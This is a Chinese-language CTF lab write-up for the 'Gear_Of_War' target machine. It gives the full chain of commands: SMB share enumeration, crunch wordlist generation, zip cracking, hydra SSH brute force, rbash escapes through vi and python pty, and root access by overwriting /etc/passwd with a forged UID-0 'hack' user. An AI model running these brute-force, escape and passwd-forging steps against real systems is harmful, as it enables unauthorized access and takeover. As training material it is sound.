Gear_Of_War靶场笔记 | Go Forward = 人生像攀登一座山，而找寻出路，却是一种学习的过程，我们应当在这过程中，学习稳定、冷静，学习如何从慌乱中找到生机

# Gear_Of_War 靶场笔记

# 信息收集

先扫描靶机基本信息

发现开放了 139 和 445 的 smb 端口，靶机系统为 Ubuntu

继续探测 smb 服务

1 2	命令 enum4linux -S IP

# 漏洞利用

1 2	发现靶机开启了该共享 //172.16.101.250/LOCUS_LAN$ 利用smbclient --user=share 共享名进行连接（无密码）

发现两个文件 msg_horda.zip 和 SOS.txt，GET 下载进行分析

# 字典生成

发现奇怪字符 [@%%,]，在密码学 crunch 中具有特殊意义

1	@ 代表小写字母，% 代表数字，, 代表大写字符， ^ 代表特殊符号

所以利用 crunch 工具进行密码生成

1	crunch 4 4 -t @%%, -o wordlist

# 密码爆破

使用 fcrackzip 工具，配合第二题生成的字典文件进行密码爆破，获取到 msg_horda.zip 的密码

1 2	命令： fcrackzip -D -p wordlist -u msg_horda.zip

成功破解得到 zip 密码 r44M，利用密码解压 msg_horda.zip 得到 key.txt

查看 key.txt，得到了一串字符 3_d4y，又发现靶机开启了 22 端口，

猜测可能是 ssh 服务的密码

# 用户爆破

一、

浏览靶机 web 端 robots.txt，猜测用户名生成字典

利用自身生成的用户字典和密码 3_d4y 爆破 SSH 服务，得到 SSH 服务用户名 marcus

1	hydra -L user.txt -p 3_d4y -t 64 ssh://172.16.101.250

二、

使用 /usr/share/wordlists/rockyou.txt 作为用户名字典，结合得到的密码尝试爆破 ssh 服务

1 2	先利用 zcat 进行解压gz文件，得到用户名字典 zcat rockyou.txt.gz >rockyou.txt

利用九头蛇进行爆破，由于字典太大，需要慢慢等待

1 2	hydra -L rockyou.txt -p 3_d4y -t 64 ssh://172.16.101.250 实在不行就利用翻转重新爆破，rev rockyou.txt

# SSH 服务渗透

利用知道的用户名和密码进行连接 ssh, 如若出现以下情况，可尝试重写输入 ssh marcus@172.16.101.250 进行连接即可

1	ssh marcus@172.16.101.250 (密码3_d4y)

成功登录 marcus 用户，但是为低权限

# rbash 逃逸和提权

首先，查看可用提权，发现无法成功

1	find / -perm -u=s 2>/dev/null

需要利用 rbash 逃逸

1
2
3

vi
:set shell=/bin/sh
:shell

也可以利用 python 进行逃逸，如下

1 2	python -c 'import pty;pty.spawn("/bin/sh")' python -c 'import os;os.system("/bin/sh")'

或者 ssh 服务登录前也可以加入参数逃逸

1	ssh marcus@172.16.101.250 -t "bash --noprofile"

# su 提权

逃逸成功后，发现可以利用 su 提权

1
2
3

思路：
当前的环境下可以执行cp和su、sudo权限，即可进行伪造、覆盖passwd文件进行su提权
所以，先生成一个伪造用户hack，指定root权限，生成passwd文件进行覆盖/etc/passwd文件，再利用su hack成功提权

1 2	命令：生成passwd文件的加密用户hack和密码hack openssl passwd -1 -salt hack hack

创建 /root/passwd 文件，将 /etc/passwd 文件复制进去，添加 hack

vim passwd
添加hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash
覆盖/etc/passwd文件
cp -p passwd /etc/passwd

切换 hack 用户，成功提权

Gear_Of_War靶场笔记